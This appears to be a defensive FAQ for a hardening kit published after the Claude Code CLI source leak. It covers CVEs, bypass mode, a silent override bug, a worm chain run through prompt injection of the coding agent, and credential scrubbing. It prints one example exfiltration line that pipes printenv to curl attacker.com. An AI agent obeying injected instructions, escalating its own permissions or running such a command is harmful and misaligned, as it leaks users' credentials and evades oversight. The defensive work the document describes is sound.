Claude Code Source Leaked – Sovereign Runtime for Claude Code (Mitigating Repo and Runtime Exploits)

No. Your conversation history, model weights, training data, and personal data were not exposed. What leaked was the TypeScript source code of the Claude Code CLI -- the client-side command-line tool that runs on your machine. Think of it as the leaked source for the application wrapper that governs what the AI can do on your computer, not the AI itself.

The security implication is not data exposure -- it is that adversaries now have the exact schematic of every permission gate, bypass mechanism, and trust boundary that Claude Code implements.

If you use only the web interface at claude.ai and have never installed Claude Code CLI, you are not directly affected by this specific incident. Claude Code is a separate product from the claude.ai chat interface. The web interface does not use the leaked CLI code.

However, if anyone on your team uses Claude Code CLI in a shared codebase, CI/CD pipeline, or with shared credentials, you may have indirect exposure through those paths.

The source map artifact was present in v2.1.88 specifically. However, the security risks from the leaked knowledge affect all current versions since the information is now public regardless of what version you are running.

For CVE-specific vulnerability, here are the critical thresholds:

• Below 2.0.65: Vulnerable to CVE-2026-21852 (API key exfiltration). Rotate your key immediately.
• Below 2.0.31: Vulnerable to CVE-2025-64755 (arbitrary file write).
• Below 1.0.105: Vulnerable to CVE-2025-58764 (approval bypass).

Check your version with: claude --version

bypassPermissions (also activated via the --dangerously-skip-permissions flag, nicknamed "YOLO mode") is a setting that disables Claude Code's entire internal permission checking system. When active, Claude can execute any bash command, write any file, make any network request, and perform any action without asking for confirmation.

This was designed for use in isolated sandbox environments where a developer wants Claude to work autonomously. The danger is that the source leak now means adversaries have the exact code path to activate this mode via prompt injection -- meaning if they can influence what Claude reads (a poisoned README, a malicious MCP server response, a compromised repo setting), they can potentially trigger bypass activation.

Additionally, the silent override bug means combining the bypass flag with plan mode causes bypass to win silently -- making it hard for developers to even know when it is active.

The silent override bug is a documented interaction in the codebase (GitHub issue #17544): when --dangerously-skip-permissions and --permission-mode plan are both active simultaneously, the bypass flag silently wins. The developer's terminal shows no warning. The UI behavior looks like plan mode. But the safety constraints of plan mode are not enforced.

The risk: an attacker who can influence how Claude Code is launched -- through a poisoned CLAUDE.md file in a repo you clone, a malicious project-level settings file, or a compromised MCP server that injects flags -- can silently escalate your session from safe planning mode to full bypass mode. The fact that this code path is now publicly readable makes it significantly easier to craft such an exploit.

The mitigation: ban bypass mode entirely via managed settings so the flag cannot be used regardless of how Claude Code is launched.

In practice, no. The pre-tool-use hook runs a set of regex pattern matches against the tool input and exits in under 50 milliseconds for almost all inputs. For context, the typical Claude Code API round-trip (sending a prompt, getting a response) takes 500ms to several seconds. The hook adds less than 1% overhead.

The post-tool-use hook similarly does lightweight pattern matching on outputs. The monitoring script runs asynchronously and has no impact on Claude Code's execution path.

If you run in environments with extremely tight latency requirements (unusual for developer tooling), you can reduce the hook's pattern set to only the highest-priority rules using the --fast mode flag documented in the QUICKSTART.

Yes, and the enterprise controls are actually stronger. Claude Code for Teams and Enterprise plans support a managed settings system that allows administrators to deploy policies that cannot be overridden by user-level settings. The managed-settings/ directory in the kit provides platform-specific policy files for macOS, Linux, and Windows deployments.

Enterprise plans also support allowManagedHooksOnly, which prevents users from disabling or replacing the security hooks. This is the strongest available configuration for enterprise environments.

The Remote Control feature (off by default for Teams/Enterprise) should remain disabled unless there is a specific operational requirement -- the leaked source makes its attack surface better understood than before.

When set to 1, this environment variable instructs Claude Code to strip all cloud provider credentials from the environment before spawning any subprocess. This includes: ANTHROPIC_API_KEY, AWS credential variables, Google Cloud credentials, Azure credentials, and similar secrets.

Without this, when Claude Code runs a bash command, that subprocess inherits the full environment of the parent process -- including all of your API keys and cloud credentials. A prompt injection payload that runs printenv | curl https://attacker.com would successfully exfiltrate all of them.

With scrubbing enabled, the subprocess environment contains only non-sensitive variables. The leaked CVE-2026-21852 surface is significantly reduced.

Add to your shell profile: export CLAUDE_CODE_SUBPROCESS_ENV_SCRUB=1

The hooks-based protection applies to all Claude Code invocations regardless of whether it is launched from the terminal, the VS Code extension, or Cursor's AI agent mode. Claude Code reads from the same ~/.claude/hooks/ directory in all these contexts.

The key steps for IDE users:

• Run the QUICKSTART once -- it installs hooks and settings globally, covering all IDEs automatically.
• Add the workspace-level VS Code settings from integrations/IDE-HARDENING.md to propagate the environment variable to all terminal sessions opened in VS Code.
• For Cursor, also add a hardened copy of settings.json to the .cursor/ directory in each project.
• For devcontainers, use the provided ci-cd/devcontainer.json template which runs the setup script automatically on container creation.

The supply chain worm vector is not theoretical. It was documented by UpGuard's analysis of 18,470 real developer .claude/settings.local.json files. The chain works as follows:

If a developer has granted Claude Code permission to (1) fetch content from the web, (2) execute code locally, and (3) push to GitHub -- all three in the same session without per-action approval -- then a compromised repository or poisoned content Claude reads can instruct it to: download a malicious payload, execute it locally, and push modified files to GitHub. Each victim repository then becomes a source of infection for the next developer who clones it.

The source leak makes this vector cheaper to exploit because the exact permission inheritance model is now readable code. Mitigate by: removing web fetch + execute + git push as a combined automatic permission, requiring per-action confirmation for push operations, and deploying the pre-tool-use hook which blocks the curl/wget-to-execution patterns.

The specific source code leak affects only Claude Code CLI (@anthropic-ai/claude-code). GitHub Copilot, Cursor's built-in AI features (except where they use Claude Code internally), and other tools are not directly affected by this specific incident.

However, the architectural lesson is universal: any agentic AI tool that implements safety guardrails in client-side code that ships to end users faces the same fundamental risk. The AI SAFE2 framework's Sovereign Runtime Governor concept is applicable to any AI coding agent, not just Claude Code.

If you use multiple AI coding tools, the same principles apply: external hooks, minimal permissions, JIT credentials, and behavioral monitoring outside the agent process.

AISM (AI Security Maturity) is the AI SAFE2 framework's maturity model for AI agent governance, analogous to CMMI or SOC maturity levels. Level 4 -- Sovereign Runtime Governance -- is the tier where an organization governs AI agent behavior primarily through external enforcement rather than vendor-provided internal controls.

In practical terms, reaching Level 4 means: you have deployed external hooks that enforce policy at the OS layer, you issue short-lived credentials for AI sessions (not long-lived API keys), you have behavioral monitoring external to the agent process, and you have CI/CD gates that prevent AI-generated changes from deploying without human review.

Most organizations using Claude Code today are at Level 1 (using Anthropic's default settings) or Level 2 (customized settings but no external enforcement). The kit in this repository gives you the building blocks to reach Level 3-4 in under an hour for development environments, and over a few days for full enterprise deployment.

If you have limited time, prioritize in this order:

• First (5 minutes): Check your version and rotate your API key if below 2.0.65. CVE-2026-21852 is a confirmed key exfiltration path and key rotation costs nothing.
• Second (5 minutes): Set export CLAUDE_CODE_SUBPROCESS_ENV_SCRUB=1 in your shell profile and install the pre-tool-use hook. These two changes eliminate the highest-probability attack paths against solo developers.
• Third (5 minutes): Audit your ~/.claude/settings.json for bypassPermissions: true. If it is there, remove it. If you have very broad allow rules, narrow them to what your specific workflow actually needs.

Everything else in the kit -- enterprise managed settings, CI/CD templates, behavioral monitoring -- is important but not as time-critical for a solo developer working in a personal repository.

Warning signs to look for immediately:

• Unexpected commits in your git history -- especially commits you do not remember making or that contain files you did not intend to change
• Anthropic API usage spikes in your console.anthropic.com billing dashboard that do not match your activity
• New API keys or credentials in your AWS/GCP/Azure console that you did not create
• GitHub Actions or CI/CD runs that were not triggered by you
• Files in your repository that reference external URLs or contain encoded strings you do not recognize
• Changes to your .github/workflows/, .gitlab-ci.yml, or other CI configuration files

Run the audit script: bash scripts/audit-installs.sh and review the last 50 commits: git log --oneline -50. The emergency rotation script includes a git history scan for leaked credentials.

California Assembly Bill 316, effective January 1, 2026, explicitly states that an organization cannot use an AI system's autonomous decision-making as a defense in liability claims. In plain language: if a hijacked or misbehaving Claude Code session damages your infrastructure, leaks customer data, or causes harm to a third party, you cannot argue that "the AI did it autonomously and we are not responsible."

The deployer is the liable party. This applies regardless of whether the failure was caused by a vendor bug, a prompt injection attack, a configuration error, or a user mistake.

The practical implication for legal and compliance teams: you need documented governance over your Claude Code deployments before an incident occurs, not after. The AI SAFE2 kit provides deployable controls that create an audit trail demonstrating governance -- logs, hooks, managed settings, JIT credentials, human review gates. Engage your legal counsel now to assess your AB 316 exposure and document your governance posture.

That is a decision for your organization based on your risk tolerance and the sensitivity of what Claude Code accesses. Stopping entirely is a valid choice for high-security environments where Claude Code processes sensitive customer data, has access to production infrastructure, or operates with elevated credentials.

For most development workflows, the risks are manageable with the controls in this kit. The key question is not "is Claude Code safe" -- it is "is Claude Code safe given the controls I have deployed." With the Sovereign Runtime Governor controls in place, the exposed bypass logic is significantly harder to exploit because your wall is external to Claude Code's process.

A reasonable middle ground: continue using Claude Code for work on isolated, non-production repositories with no production credentials present, while you deploy the full kit for production-adjacent workflows.

This is the most important question to answer correctly.

Anthropic will release a patched version. The npm packaging failure will be fixed. But patching does not solve the fundamental problem: the leaked knowledge is already in the public domain and cannot be un-leaked. Adversaries who have archived and studied the source code retain that knowledge permanently regardless of what happens to the npm package.

More broadly, this was the second occurrence of the same failure in 13 months. Each future release is a potential third occurrence. The adversary community now knows exactly where to look.

The architectural argument for external controls is not "Anthropic is incompetent." It is "any sufficiently complex software system will have vulnerabilities, and any client-side code can eventually be reverse-engineered or leaked." Building your security model on the assumption that vendor-internal code remains opaque is a fragile foundation. External controls that enforce at the OS layer do not depend on that assumption -- they work regardless of whether the internal code is public or private.